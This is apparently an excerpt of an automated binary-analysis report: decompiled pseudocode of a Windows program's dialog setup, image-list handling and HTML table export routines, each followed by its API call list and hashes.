                                                                                                                                                                                                                          						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                                                                                                                                          						_v1216 = 0;
                                                                                                                                                                                                                          						memset( &_v1214, 0, 0x208);
                                                                                                                                                                                                                          						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                                                                                                                                          						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                                                                                                                                          						 *(_t62 + 0x2a8) = _t58;
                                                                                                                                                                                                                          						_push(_t58);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                                                                                                                                                          					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                                                                                                                                          					 *(_t62 + 0x2ac) = _t46;
                                                                                                                                                                                                                          					__imp__ImageList_SetImageCount(_t46, 0);
                                                                                                                                                                                                                          					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                                                                                          				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                                                                          				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                                                                          				_v1244 = _t37;
                                                                                                                                                                                                                          				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                                                                                                                                                          				_t38 = GetSysColor(0xf);
                                                                                                                                                                                                                          				_v1248 = _t38;
                                                                                                                                                                                                                          				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                                                                                                                                                          				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                                                                                                                                                          				DeleteObject(_v1268);
                                                                                                                                                                                                                          				DeleteObject(_v1268);
                                                                                                                                                                                                                          				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407FD0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407FE5
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 004080B4
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 004080D1
                                                                                                                                                                                                                          • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 304928396-0
                                                                                                                                                                                                                          • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                                                                          • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                                                          			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				void _v518;
                                                                                                                                                                                                                          				long _v520;
                                                                                                                                                                                                                          				void _v1030;
                                                                                                                                                                                                                          				char _v1032;
                                                                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                                                                          				wchar_t* _t57;
                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t58 = __esi;
                                                                                                                                                                                                                          				_v520 = 0;
                                                                                                                                                                                                                          				memset( &_v518, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1032 = 0;
                                                                                                                                                                                                                          				memset( &_v1030, 0, 0x1fc);
                                                                                                                                                                                                                          				_t60 = _t59 + 0x18;
                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t57 = _a4;
                                                                                                                                                                                                                          				 *_t57 = 0;
                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                          					wcscpy(_t57, L"<font");
                                                                                                                                                                                                                          					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                                                                                                          					if(_t32 > 0) {
                                                                                                                                                                                                                          						_push(_t32);
                                                                                                                                                                                                                          						_push(L" size=\"%d\"");
                                                                                                                                                                                                                          						_push(0xff);
                                                                                                                                                                                                                          						_push( &_v520);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						wcscat(_t57,  &_v520);
                                                                                                                                                                                                                          						_t60 = _t60 + 0x18;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                                                                                                                          						_push(E0040ADC0(_t33,  &_v1032));
                                                                                                                                                                                                                          						_push(L" color=\"#%s\"");
                                                                                                                                                                                                                          						_push(0xff);
                                                                                                                                                                                                                          						_push( &_v520);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						wcscat(_t57,  &_v520);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					wcscat(_t57, ">");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                                                                                          					wcscat(_t57, L"<b>");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				wcscat(_t57, _a8);
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                                                                                          					wcscat(_t57, L"</b>");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                          					wcscat(_t57, L"</font>");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t57;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                          • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                                                                          • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                          			E00403C03(void* __eflags) {
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t88;
                                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                                          				void* _t113;
                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                          				void* _t122;
                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                          				intOrPtr* _t124;
                                                                                                                                                                                                                          				void* _t134;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t113 = _t108;
                                                                                                                                                                                                                          				E00403B3C(_t113);
                                                                                                                                                                                                                          				E00403B16(_t113);
                                                                                                                                                                                                                          				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                                                                                                                                                          				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                                                                                                                                                          				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                                                                                                                                                          				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                                                                                                                                                          				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                                                                                                                                                          				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                                                                                                                                                                          				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                                                                                                                          				 *_t124 = 0x3ea;
                                                                                                                                                                                                                          				E0040AD85(GetDlgItem(??, ??));
                                                                                                                                                                                                                          				 *_t124 = 0x3f1;
                                                                                                                                                                                                                          				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                                                                                                                                                          				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                                                                                                                                                          				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                                                                                                                                                          				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                                                                                                                                                          				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                                                                                                                                                          				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                                                                                                                                                          				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                                                                                                                                                          				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                                                                                                                                                          				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                                                                                                                                                          				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                                                                                                                                                          				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                                                                                                                                                          				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                                                                                                                                                                          				_t134 = _t124 + 0x78;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                                                                                                                                                                          				_t119 = 1;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t17 = _t119 + 0x280; // 0x281
                                                                                                                                                                                                                          					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                                                                                                                                                          					_t134 = _t134 + 0xc;
                                                                                                                                                                                                                          					_t119 = _t119 + 1;
                                                                                                                                                                                                                          				} while (_t119 <= 9);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                                                                                                                                                          				_t121 = 1;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t21 = _t121 + 0x294; // 0x295
                                                                                                                                                                                                                          					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                                                                                                                                                          					_t134 = _t134 + 0xc;
                                                                                                                                                                                                                          					_t121 = _t121 + 1;
                                                                                                                                                                                                                          				} while (_t121 <= 3);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                                                                                                                                                          				_t122 = 0;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                                                                                                                                                          					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                                                                                                                                                          					_t134 = _t134 + 0xc;
                                                                                                                                                                                                                          					_t122 = _t122 + 1;
                                                                                                                                                                                                                          				} while (_t122 <= 0xd);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                                                                                                                                                          				_t123 = 0;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                                                                                                                                                          					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                                                                                                                                                          					_t134 = _t134 + 0xc;
                                                                                                                                                                                                                          					_t123 = _t123 + 1;
                                                                                                                                                                                                                          					_t143 = _t123 - 3;
                                                                                                                                                                                                                          				} while (_t123 < 3);
                                                                                                                                                                                                                          				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                                                                                                                                                          				E00403EC3(GetDlgItem, _t113);
                                                                                                                                                                                                                          				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                                                                                                                          				_t88 = E00402D78(_t113, _t143);
                                                                                                                                                                                                                          				E00402BEE(_t113);
                                                                                                                                                                                                                          				return _t88;
                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                          0x00403e58
                                                                                                                                                                                                                          0x00403e68
                                                                                                                                                                                                                          0x00403e6d
                                                                                                                                                                                                                          0x00403e70
                                                                                                                                                                                                                          0x00403e71
                                                                                                                                                                                                                          0x00403e71
                                                                                                                                                                                                                          0x00403e87
                                                                                                                                                                                                                          0x00403e8d
                                                                                                                                                                                                                          0x00403e9e
                                                                                                                                                                                                                          0x00403ea6
                                                                                                                                                                                                                          0x00403eaf
                                                                                                                                                                                                                          0x00403ebc

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                                                                            • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                                                                                                                          • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                                                                                                                          • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00403C6A
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00403C7F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                                                                                                                            • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                                                                                                                            • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                                                                                                                            • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403D64
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E20
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1038210931-0
                                                                                                                                                                                                                          • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                                                                          • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                                                          			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                          				void _v138;
                                                                                                                                                                                                                          				long _v140;
                                                                                                                                                                                                                          				void _v242;
                                                                                                                                                                                                                          				char _v244;
                                                                                                                                                                                                                          				void _v346;
                                                                                                                                                                                                                          				char _v348;
                                                                                                                                                                                                                          				void _v452;
                                                                                                                                                                                                                          				void _v962;
                                                                                                                                                                                                                          				signed short _v964;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                                          				wchar_t* _t109;
                                                                                                                                                                                                                          				intOrPtr* _t124;
                                                                                                                                                                                                                          				signed int _t125;
                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                          				signed int _t153;
                                                                                                                                                                                                                          				intOrPtr* _t154;
                                                                                                                                                                                                                          				signed int _t156;
                                                                                                                                                                                                                          				signed int _t157;
                                                                                                                                                                                                                          				void* _t159;
                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t124 = __ebx;
                                                                                                                                                                                                                          				_v964 = _v964 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v962, 0, 0x1fc);
                                                                                                                                                                                                                          				_t125 = 0x18;
                                                                                                                                                                                                                          				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                                                                                                                                          				asm("movsw");
                                                                                                                                                                                                                          				_t153 = 0;
                                                                                                                                                                                                                          				_v244 = 0;
                                                                                                                                                                                                                          				memset( &_v242, 0, 0x62);
                                                                                                                                                                                                                          				_v348 = 0;
                                                                                                                                                                                                                          				memset( &_v346, 0, 0x62);
                                                                                                                                                                                                                          				_v140 = 0;
                                                                                                                                                                                                                          				memset( &_v138, 0, 0x62);
                                                                                                                                                                                                                          				_t161 = _t159 + 0x3c;
                                                                                                                                                                                                                          				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                                                                                                                                          				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                                                                                                                                                          				if(_t87 != 0xffffffff) {
                                                                                                                                                                                                                          					_push(E0040ADC0(_t87,  &_v964));
                                                                                                                                                                                                                          					_push(L" bgcolor=\"%s\"");
                                                                                                                                                                                                                          					_push(0x32);
                                                                                                                                                                                                                          					_push( &_v244);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t161 = _t161 + 0x18;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                                                                                                                                          				_v8 = _t153;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                          						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                                                                                                                                                          						_v12 = _t156;
                                                                                                                                                                                                                          						_t157 = _t156 * 0x14;
                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                                                                                                                                                          							wcscpy( &_v140, L" nowrap");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v32 = _v32 | 0xffffffff;
                                                                                                                                                                                                                          						_v28 = _v28 | 0xffffffff;
                                                                                                                                                                                                                          						_v24 = _v24 | 0xffffffff;
                                                                                                                                                                                                                          						_v20 = _t153;
                                                                                                                                                                                                                          						_t154 = _a8;
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                                                                                                                                                          						E0040ADC0(_v32,  &_v348);
                                                                                                                                                                                                                          						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                                                                                                                                                          						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                                                                                                                                          							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_push( *(_t157 + _v16 + 0x10));
                                                                                                                                                                                                                          							_push(E0040ADC0(_t106,  &_v964));
                                                                                                                                                                                                                          							_push(L"<font color=\"%s\">%s</font>");
                                                                                                                                                                                                                          							_push(0x2000);
                                                                                                                                                                                                                          							_push( *(_t124 + 0x68));
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							_t161 = _t161 + 0x14;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t109 =  *(_t124 + 0x64);
                                                                                                                                                                                                                          						_t140 =  *_t109 & 0x0000ffff;
                                                                                                                                                                                                                          						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                                                                                                                                          							wcscat(_t109, L"&nbsp;");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                                                                                                                                                          						_push( &_v140);
                                                                                                                                                                                                                          						_push( &_v348);
                                                                                                                                                                                                                          						_push( *(_t124 + 0x68));
                                                                                                                                                                                                                          						_push( &_v244);
                                                                                                                                                                                                                          						_push( &_v452);
                                                                                                                                                                                                                          						_push(0x2000);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t161 = _t161 + 0x28;
                                                                                                                                                                                                                          						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                          						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t153 = 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L14:
                                                                                                                                                                                                                          				E00407343(_t124, _a4, L"</table><p>");
                                                                                                                                                                                                                          				return E00407343(_t124, _a4, L"\r\n");
                                                                                                                                                                                                                          			}
                                                                                                                                                                                                                          0x0040798a
                                                                                                                                                                                                                          0x004079a1

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
